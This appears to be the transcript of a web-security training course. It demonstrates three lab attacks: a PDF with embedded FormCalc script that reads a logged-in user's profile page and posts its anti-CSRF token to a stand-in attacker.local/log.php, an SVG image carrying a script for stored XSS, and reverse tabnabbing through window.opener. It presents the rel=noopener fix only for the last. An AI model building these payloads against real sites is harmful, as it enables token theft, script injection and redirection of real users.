Hi, my name is David. Welcome to my course, Hacking Web Applications via PDFs, Images, and Links. User data is processed every single day by modern web applications. Think about PDFs, images, and links. They are everywhere. What's more, they can be used to hack your web applications, and obviously you don't want that to happen. In this course, you will learn how your web applications can be hacked via PDFs, images, and links. What's more, you will learn how to check if your web applications are vulnerable to these attacks. First, I will show you how an attacker can steal a user's sensitive data via a PDF. Next, I will present how the attacker can launch an XSS attack via an image. And finally, I will demonstrate how the attacker can launch a user redirection attack via a link. For every single attack presented in this course, there is a demo so that you can see step by step how these attacks work in practice. Okay, basically this is it. And now, without further delay, let me jump to the next clip and let me show you the first attack in this course. Okay guys, let's start with case number 1, token hijacking via PDF file. What I want to present to you in this case is how you can hack the web applications with PDF files. This is a really great attack because PDF files are everywhere. They are ubiquitous. So now imagine that you can upload a malicious PDF file to the web application and then somehow magically you can steal a token of the user as a result of processing of this malicious PDF file. That's gonna be a great and powerful attack. And this is exactly what I want to present to you here. So I've got a demo, and the demo for this case is located at training.local/token hijacking in my testing environment. So let me go there right now and let me show you how this attack works in practice. Okay, here is my demo for this case. And what this demo is all about, it is actually about uploading a PDF file, and I just want to upload here actually a malicious PDF file, okay? And this case is about token hijacking via PDF file. And so the question right now is, what kind of token I am talking about? Let me tell you more about the context of this demo here, okay? And then it will be more clear. So what I've got here is the user that is authenticated to the web application. The web application is hosted on the domain training.local, and what you can see right now in the URL is training.local/profile.php. And indeed, as you can see, there is a user Michael. The Michael is right now logged in to this web application. And what you can find out in the source code of this page is the anti-CSRF token. Anti-CSRF token is used to prevent from the so-called cross-site request forgery attack. That's why something like this needs to be actually implemented in our web applications. And I'm not going to go into the details of cross-site request forgery attack. This is a kind of basic stuff, and I assume that you know what it is. But let me right now just show you that indeed anti-CSRF token is out there in the source code, okay? So let me go to the page source right now. And as you can see in the line number 26, there is input type hidden, name anti-CSRF, and there is a value of this anti-CSRF token, okay? So great. Indeed, the anti-CSRF token is out there, and my goal is to steal the value of this token from the user. The user is Michael, and in order to steal the value of this token, I'm gonna upload a malicious PDF file to the web application, okay? And before I proceed with this case, I just want to tell you why token hijacking is interesting here. Well, the anti-CSRF token is a sensitive piece of data. If I can steal somehow this anti-CSRF token, and in this case, I'm gonna do it via PDF file, then I can actually launch CSRF attack against this user, and this is what I want to do, okay? And the CSRF attack is cross-site request forgery. So it does make a sense to do an attack like this, token hijacking via PDF file, okay? Great. So far, so good. So what I'm about to do is uploading a malicious PDF file to the web application. And now let me show you how this malicious PDF file looks like and what it is actually going to do, okay? So let me go here to the console, and in my testing environment at the location var www training attacker, I've got my malicious PDF file, and this malicious PDF file is token hijacking PDF. So let me open right now this file, and actually let me show you the content of this file, okay? Because this is what I want to discuss with you. So what you can see inside of this malicious PDF file is something like this: script content type application X form calc. So what we can do actually is attackers, is we can include the script inside the PDF file. And this is going to be really interesting. And the way of how we can do it is using the so-called X form calc, okay? So there is something called X form calc scripting, and this is gonna be really powerful once it is used by the attacker, okay? And in a couple of minutes, you will see actually how it works. So basically, we can put our own scripts inside the PDF files via the so-called X form calc scripting. Great. And now I've got here a malicious script that is doing something interesting. Let me right now read the following lines of the code. So there is a line var content get training.local/profile.php. So what this line is going to do is actually reading the page profile.php, right? Reading the HTML code of this page, right? So this is what I am about to do here. And the HTML code of this page, so of training.local/profile.php, is going to be stored in the variable named content. And now you can ask the question, why am I doing this? Well, my goal behind this attack is to steal the anti-CSRF token of the user, right? A couple of minutes ago, I presented to you the HTML code of training.local/profile.php. Out there is the anti-CSRF token of the victim, so I just want to use my malicious PDF file to read the HTML code of profile.php, because out there is the anti-CSRF token of the victim, and this is actually what I am about to steal as a result of this attack, okay? That's why this attack is called token hijacking via PDF file. Great. So this is the first thing that I am about to do. And the next thing that I am about to do is specified in the next line actually. So there is something like post attacker.local/log.php, content. So once the HTML code of profile.php has been read and stored in the variable named content, then I want the content of this variable, so the content of the variable named content, I want to send it out to the attacker, right? The domain attacker.local to the resource actually log.php. So I want just to, transmit this HTML code of profile.php to the attacker control domain. And this is exactly what I'm doing here in this line of code, okay? So this is basically how this malicious PDF file is going to work, okay? And I believe that this is clear for you. And the next thing that I want to do is actually I want to present to you that this attack really works. And it turns out that this attack works in Internet Explorer and Acrobat Reader. So this kind of combination. And yeah, later on I will explain you more why it works in Internet Explorer and Acrobat Reader. But right now I want to show you that it is indeed possible to launch this attack in Internet Explorer and Acrobat Reader, okay? So my testing environment is based on Linux. So right now I'm going to go to another VM, Windows-based VM. Out there, I've got Internet Explorer, I've got Acrobat Reader, and yeah, in that separate Windows-based virtual machine, I will connect to my testing environment for this case, and I'm going to show you step by step how this attack works, okay? So let me right now go to this Windows-based virtual machine, and let me show you step by step how this attack works. This is my Windows-based virtual machine. And first, I'm going to connect to my testing environment where my demo is actually located. So let me put here training.local/token hijacking, okay? Okay, great. So right now I am connected to my testing environment. This is my demo, exactly the same that I presented to you a couple of minutes ago in the Linux based environment, okay? So now I just want to upload this malicious PDF file. So let me click browse. And what you can see here is that I've got this file token hijacking already on this Windows-based virtual machine. Well, this is exactly the same file that I presented to you a couple of minutes ago in this Linux-based testing environment, okay? I presented to you actually step by step what is malicious in this file, right? I presented the content of this file, and actually before recording this video, I copied this file from my VM with Linux-based testing environment to this VM with Windows, okay? So this is exactly the same file that I discussed already. So nothing new here. I'm just about to upload this file right now to the web application. So let me click upload PDF. And what you can see is that the file has been successfully uploaded and it is available here. Well, here there is a link behind this word here. And now I want to go to this location, right? I want to go to this location where this file is uploaded, and I'm gonna show you that this attack, token hijacking via PDF file, is really working nice. Of course, here I'm presenting this attack to you. In a real attack, you are going to send a link to this malicious uploaded PDF file to the victim, okay? And the victim is going to actually go to this resource. I mean, the victim is going to click this link to the malicious uploaded PDF file, okay? So let me remind you the context. The context is that there is a user called Michael. Michael is logged in to the web application hosted on the domain training.local. Right now you can see training.local/profile.php. So, well, indeed, Michael is authenticated, and now it's time to present the attack, actually step by step in practice. So I'm going to copy the link to this malicious PDF file, right? And now, in order to show you step by step how it works, I'm going to paste this link in a separate window. Let it be here. And what I want to do also is I want to open DevTools in Internet Explorer, because I want to show you what is actually going to happen in the background once this link is actually clicked by the user, or once the user goes to this malicious uploaded PDF file. Okay, so let me open the DevTools and let me start capturing the network traffic. Okay, and now let me paste here in the URL bar the link to this malicious PDF file. You can see training.local, token hijacking, uploads, then we've got some random characters, token hijacking.pdf. So this is my malicious uploaded PDF file. Now I'm going to hit enter, okay? And what you can see is, well, something strange or unexpected, let's say. Script failed. Well, there is a reason why this script failed at this particular moment. So I'm going to click OK and I will explain it to you, okay? So the reason why this script failed is because it has been blocked by Acrobat Reader. Please take a look at this message provided by Acrobat Reader. Data from this site is blocked to avoid potential security risks. If you trust this document, add the host training.local to privileged locations in enhanced security preferences to receive data. Well, if you trust this web application hosted on the domain training.local, and you are a classical user of the web application, okay, then when you see that there is a PDF file out there and you just want to read this PDF file from your trusted domain, training.local, okay, then you're gonna go here to the options and you're gonna click add host to privileged locations, right? This is what classical users are gonna do. We are security people and we are aware of these risks and these warnings. But, well, the reality is like this. The classical user, when the user trusts a web application hosted on a given domain, then if the user wants to see this PDF file, then the user will click add host to privileged locations, right? This is what's gonna happen in reality. And now let me do it. And I want you to analyze later on the outgoing traffic from my browser, actually, once I click this add host to privileged locations, okay? So let me do it. And please notice what actually happened out there. I mean, what you can see in this network tab of DevTools in Internet Explorer is actually the traffic generated by my browser. And in this traffic, you can see one really interesting outgoing request. There is a request going out to attacker.local/log.php. So this is actually what my attack is all about. Do you remember the content of this malicious PDF file? I was about to steal the HTML code of training.local/profile.php, and I was about to send out this HTML code to attacker.local/log.php. Okay, that's why you see this stuff here, and it actually proves that my attack has been successful. And now let me show you that, well, indeed, it is true. So now I'm going to click this guy and I'm going to actually present to you the request body, okay? There is some kind of problem reading this document, but well, actually it is not a problem for me because my attack has been launched successfully. And let me go right now to the request body. And this is the request body of the request going out to attacker.local/log.php. And what you can see out there is actually the HTML code of training.local/profile.php. Can you see that? There is profile, the name is Michael, right? We see also the email of the Michael. And down below, you can see input type hidden, name anti-CSRF, and the value of the anti-CSRF token. So indeed, as you can see, I was able to steal the HTML code of training.local/profile.php. This HTML code has been sent to the attacker as a result of processing of this malicious PDF file. And well, I achieved actually what I wanted to achieve, okay? So it shows you actually the power of this attack. And of course, the assumption here is that the victim, so Michael, is authenticated to the web application hosted on the domain training.local. I presented to you the profile of this user. So the user was logged in. Once the user is logged in, out there is the anti-CSRF token. So actually, this is what must be happening out there, right? The user is authenticated. Once the user is authenticated, out there is the anti-CSRF token of this user, and I just want to steal this anti-CSRF token, okay? So this is a kind of, let's say, a prerequisite to this attack, right? Great. So as you can see, this attack works really nice. And now let me go to the slides and let me wrap up what I have presented to you in this case, okay? So the first thing that I told you is that scripts can be included in PDF files. And I told you that you can use the so-called Xform calc scripting to make it happen, okay? And next, I actually uploaded a malicious PDF file to my demo web application. I explained to you step by step what this file is all about, what is going on out there as a result of processing of this malicious PDF file. Then the PDF file was actually visited by the user. And well, we actually, attackers need to send a link to this uploaded malicious PDF file to the user, right? This is how it works. And then once this PDF file is actually visited by the user, then the script included in this malicious PDF file reads the HTML code of training.local/profile.php and sends this code to the attacker. And as I presented to you, inside is a user's anti-CSRF token in this code. And yeah, this was my goal, right? And as I presented to you, it is indeed possible to hijack a user's anti-CSRF token via a PDF file. And I presented this attack in Internet Explorer in combination with Acrobat Reader, okay? So this is it. As you can see, really, really powerful attack. And due to the popularity of PDFs, due to the fact that PDFs are ubiquitous, you can actually launch this attack on many different websites. And finally, let me tell you why this attack actually works in Internet Explorer together with Acrobat Reader, because this is also interesting here. Well, when you are about to read the PDF file in Internet Explorer, then Internet Explorer delegates this responsibility, so the responsibility to actually read this PDF file, to the external program, okay? And if you've got Acrobat Reader installed on your machine, then this is this external program that is going to be used to read this PDF file, okay? And Acrobat Reader has implemented Xform calc scripting, okay? And that's actually the reason why this attack works. Now, let me tell you why this attack doesn't work, for example, in Google Chrome. Well, Google Chrome works a little bit differently in terms of the processing of PDF files. When you want to open or you want to just read the PDF file in Google Chrome, then Google Chrome delegates the responsibility of reading this PDF file to Google Chrome's plugin. So Google Chrome has its own plugin to read the PDFs, okay? And in this plugin, the Xform calc scripting is not implemented. And that's the reason actually why this attack is not working in Google Chrome. So as you can see, we've got exploitation that is dependent actually on the software that you are using, right? So here we are talking about the browser and the differences in browsers in the context of how they actually handle the processing of PDF files, okay? So just to summarize once again why it works in Internet Explorer and Acrobat Reader. Internet Explorer is about to read the PDF file. Then what Internet Explorer is doing is delegating this responsibility of reading this PDF file to the external program. The external program on my machine is Acrobat Reader. Acrobat Reader has implemented Xform calc scripting, so we can actually use Xform calc scripting to launch our attack, which is token hijacking via malicious PDF file, okay? So this is the explanation. So I believe, guys, that this is clear for you right now, and I believe that this is informative for you. And yeah, we are done with this case. So let me right now jump to the next one. Hello guys, how are you? XSS via image. As I told you in the introduction, images are ubiquitous. They are everywhere. In virtually every single web application, we've got image processing, image upload, and stuff like that. And if you know how to launch an XSS attack via image, then you are in a very privileged position because this is a big opportunity for you right now. Okay? So when you think about the images, well, there are different file formats, like, for example, JPG, PNG, and stuff like that. But there is also something called SVG, one of the most popular graphical file formats that is quite often supported by the companies that have web applications, right? So this is what I'm gonna focus right now on. I'm gonna focus on SVG because SVG, which is actually an XML-based graphical file format, is really, really interesting from a hacker's point of view. So this is one of the graphical file formats that is supported by quite many companies, and this is very nice from the hacker's point of view because SVG file can contain scripts. It's beautiful. And here is the difference between SVG and other graphical file formats. SVG is, let's say, active, in between the quotes, active, right? Because it can contain scripts, and this is a legitimate part of SVG, but you can use it, you as a hacker, you can use it to launch your XSS attack. And other popular graphical file formats are, let's say, passive, in between the quotes, because this is just an image, right? In that cases, just an image that is just displayed without any kind of active content, this kind of thinking. Okay, so you see that SVG is really your friend if you are a bug hunter or ethical hacker or penetration tester. So the attack scenario in case of SVG files is like this. You need to upload an SVG file with a script. And then the SVG file is visited by the user. And once it is visited by the user, the script is executed. And what we've got here is stored XSS attack. Because when you upload an SVG file, then, well, it is uploaded, stored somewhere on the server side. So you've got stored XSS, right? Which is the best form of XSS attack because, well, once it is delivered, it can be easily used to attack other people who visit the web application, which is really, really good from the attacker's point of view. And yes, you can get at the end of the day very nice reward for something like that in bug bounty programs. And it was a high-level overview, right? So that you can understand how this attack works. And in a minute, I will jump to the demo because I want you to see this attack in action. I want you to be able to see how to put a script inside an SVG file, right? But it was a kind of technical overview so that you can get a feeling and understanding of a given problem, and now demo so that you will see everything in details, in practice, in action, and then everything will be clear. So I believe that this is clear for you up till now. So let's jump to demo and let's see this attack in action. What I've got here is my testing web application, and what you can see on my screen is a profile, right? My name is David and you see my profile here, and what I can do right now is I can just scroll down here and I can upload a new photo, right? Which is really kind of a basic functionality in many web applications. So I'm gonna do it right now, but instead of uploading real photo, my real image, I'm going to upload an SVG file with a script because I want to launch an XSS attack via image. So before I upload this SVG file, I want to show you this file because you need to see it to understand how it works step by step. So let me go here. I've got this SVG file. So as I told you in the technical overview, an SVG is an XML-based graphical file format, and now you can see it. And it can contain scripts. So what you can see here is a perfectly legitimate, valid SVG file. And what we've got here, for example, the line number 3 and 4, the rectangle and the line are created, right? But this is not interesting from a security point of view. What is interesting from security point of view is this line, the line number 2. I've got a very simple proof of concept. Script alert XSS close script. This is interesting from the attacker's point of view. And you can clearly see in line number 1 that this is an SVG, right? So this is it. You can just take this file, you can upload it to the web application, and you can see if indeed an XSS via SVG is possible or not. So now you've got the understanding of SVG. You understand how to put a script inside the SVG. And again, this is a perfectly legitimate SVG file. But what we've got inside is a script. But again, scripting is allowed in SVG files. And this is really risky from security point of view, but not many people are aware of it. Okay, so let me right now go to my web application. Again, you can see my name here in the upper right corner, David. Now I'm gonna change my photo. So I'm gonna click browse and I will select this xss.svg, and this is how this SVG file looks like, right? So it looks like, well, very, let's say, it's not complicated image, but it doesn't matter. It has script inside, okay? So let me now click open, and I'm gonna upload it. Nice success, profile photo updated. And this is my beautiful new photo. And now I'm gonna copy a link to this photo, okay? Because, well, I'm gonna launch an XSS attack. So copy image location, and I will go to another browser in my lab. And in another browser, I've got another user, Michael. Let's take a look here in the upper right corner. So I'm gonna right now, and this is the profile of Michael, but right now I'm gonna access Michael, right? Or launch an XSS attack against Michael. So in the URL bar, I will paste the link to this SVG file that has been uploaded to the same web application, right? Because both David, so me, and Michael are users of this web application hosted on the domain example.com. So what you can see in the URL bar is just a link to the SVG file that I just uploaded. So this is example.com/upload/pictures/photo, some random string of characters, xss.svg, because it was the name of this file that I uploaded, okay? So this is my SVG, and now I'm gonna hit enter, and let's see what's gonna happen. XSS, which is beautiful, right? And now you see that indeed it works. So yeah, that's so easy. You can upload this SVG file, and then you can send a link to this file to the victim. And once this link is clicked exactly, how I presented in this demo, then the game is over. You've got an XSS, and this is stored XSS because right now this SVG file is stored on the server side. So this way you can really easily attack other users of the system. So now I believe that it is clear. I explained every single step of this attack. I hope that you like this attack. So let's jump to the next video. Okay, guys, now it's time to discuss the next case. User redirection via window opener tabnabbing. In this case, I'm going to show you how you can hack the users of the web application via malicious links. This is really a great attack because links are ubiquitous. Links are everywhere, and almost in every single web application you can create links. So there is a plethora of opportunities for you to create malicious links and show to the bug bounty program owners how to hack their users via malicious links created on their own domains or in their own web applications, right? Really something great, huge potential, and well, a lot of opportunities also to earn more and more money because you can show the same technique to many different companies, right? Because links are ubiquitous. So this is a very nice motivation for us bug hunters, right? So now without further delay, let me go to the testing environment and let me show you a demo. Let me show you how this attack works in practice step by step. In my testing environment, the demo is located at training.local/opener, so let me go there right now. Okay, cool. Here is my demo. So what I'm about to do is I'm going to create a link. So let me first put some sentence here like David is a hacker, and I want David to be a link, okay? But before I create a link here, I want you to notice that my demo is hosted on the domain training.local, okay? And on this domain, so on the domain training.local, I'm gonna create my malicious link. And I want my malicious link to be pointing to attacker.local/tabnabbing.html. So assume that I am the attacker right now, and attacker.local belongs to me. So why not to create a link pointing to my own domain, right? and you see the resource tabnabbing.html. And in the source code of this resource, there is actually, the malicious piece of code responsible for this user redirection that I'm going to make here. So this is, the essence of the attack is out there, and we'll come to the source code of this resource later on. Okay, so this is it. This is what I'm gonna do. So I've got a domain training.local. On the domain training.local, I create a malicious link pointing to attacker.local/tabnabbing.html. What's more, I want this link to be created with target attribute equal to blank. Let me explain it to you. When you create a link with target attribute equal to blank, then once this link is clicked, then the resource behind this link is opened in a new window. And this is what I'm gonna make here. And this is actually the explanation of target blank, okay? So let me do it right now. Let me create this link, link pointing to attacker.local/tabnabbing.html with target equal to blank, okay? So I want David to be this link, right? So first I'm gonna copy this guy, right? David's gonna be the link pointing to attacker.local/tabnabbing.html. Now let me go to target, and target is gonna be blank. This is what I just explained to you, right? What it means. Okay. So what I've got here is David is a hacker, and now David here, let me highlight it a little bit. You can see in the bottom left corner that indeed David is a link to attacker.local/tabnabbing.html. So far, so good. So right now I'm gonna click this link, but before I click this link, I want you to see once again that my demo is hosted on the domain training.local, and my malicious link has been created on this domain, on the domain training.local. I just want to emphasize it because some magic will happen here when I click this link, okay? So I just want you to pay attention to the URL bar right now so that you can see this magic in action in the upcoming minutes, okay? Cool. Now let me click David, and you see the new window has been opened. Because we've got this attribute target blank. And what you can see in this new window is, well, attacker.local/tabnabbing.html, right? This is what we expect to see because our malicious link points to this domain. It points to this resource. And we've got some message like check the previous tab because this is the demo, okay? So nothing surprising here. I see what I was supposed to see, okay? Now, let me go back to my previous window, okay? The previous window. This is strange and surprising. Now I see in the URL bar attacker.local/redirection.html, and there is some message, you have been redirected. This is weird. I was here 1 minute ago, 2 minutes ago, something like this. It was the domain training.local. I created my malicious link on the domain training.local, and now magically I see that I have been redirected to the domain attacker.local, right? You can see it clearly. This is the proof of concept. You actually see this attack in action. Really beautiful, really easy, to launch this attack. Just create a malicious link. Once it is clicked, you are redirected. You can see it. So cool, really cool, but well, what's the explanation of this magic? Of course, it's not a magic. There is some technical explanation behind this attack, and this is what I'm going to show you, okay? So to explain you this attack, what has happened from the technical point of view, let me go here to attacker.local/tabnabbing.html. Because the explanation is out there. My malicious link points to attacker.local/tabnabbing.html. And as I already told you, tabnabbing.html includes the malicious piece of code that is responsible for this redirection. I am the attacker. attacker.local belongs to me, so I can put whatever I want in the source code of tabnabbing.html, right? So let me show you right now the source code of tabnabbing.html here in my demo. So view page source, and let me explain it to you so that you can really understand what happened here. And please focus especially on the line number 12, because the explanation is out there. Opener.location =, https attacker.local/redirection.html. This is the most important line here. What is happening here actually in this line number 12? The value of opener.location has been overwritten with attacker.local/redirection.html. But the question is why? Why am I doing something like this as an attacker, right? So in order to understand it, you have to know first what opener.location is. Because I'm just overwriting opener location here, right? But what's that? What is the opener location? Let me explain to you. My malicious link was created on the domain training.local. And the opener location is training.local because my malicious link was clicked out there, okay? And what I'm doing here in this line of code is I'm overwriting the value of opener location. I as attacker, I don't want the opener location to be still training.local. I want to launch some attack here. So I'm going to overwrite opener.location with a new value. What value? attacker.local/redirection.html. So I'm going to do actually user redirection, right? And this is how user redirection via window opener tabnabbing works, which is really beautiful. You can override the value of opener and actually the value of opener.location. And this is actually responsible for this magic. Cool. Really nice attack. Really nice demo. I believe that you like it. And now the question is like this. Well, we've got so many links, in different web applications. Links are almost everywhere, right? Almost in every single web application, we can create links, and we don't want the attacks like this, to be working everywhere. How to fix this issue? How to prevent this attack from happening? So let me right now go to the whiteboard and let me show you the countermeasure, right? Because, well, I just want to show it to you so that you know how to fix this problem. Opener. Okay. This is what you should do. And of course, we need to also close the A tag. Okay. So this guy is actually going to be responsible for, preventing this attack from happening. When you create a link with attribute rel = no opener, then the attacker will not be able to override the opener, and this attack will no longer be working, okay? So as you can see, the countermeasure is really simple, but well, you have to implement it. Otherwise, this attack is working. And yeah, this is how it works. So I believe that this is clear for you. And let me right now go to the slides and let me summarize what I have presented to you, okay? So I created a link to the attacker's controlled domain. So there was a link to attacker.local/tabnabbing.html. I created this link with target attribute equal to blank, and I explained to you what it is. Then I clicked this link and the reference to the origin was sent to the attacker, and the reference can be overwritten by the attacker. And this is exactly what I presented to you, right? I presented to you the source code of tabnabbing.html hosted on the domain attacker.local, and I discussed this one crucial line of code, opener.location = https attacker.local/redirection.html. Here is where we actually are overwriting the opener location, and this is responsible for this attack. This is the crucial part of this attack, okay? And this way, actually, user redirection via window opener tabnabbing is possible. And in addition to this, I also presented the countermeasures, so how to prevent this attack from happening with rel attribute equal to no opener. So I believe that you like this video. I believe that this attack is clear for you. And yeah, we are done with this case.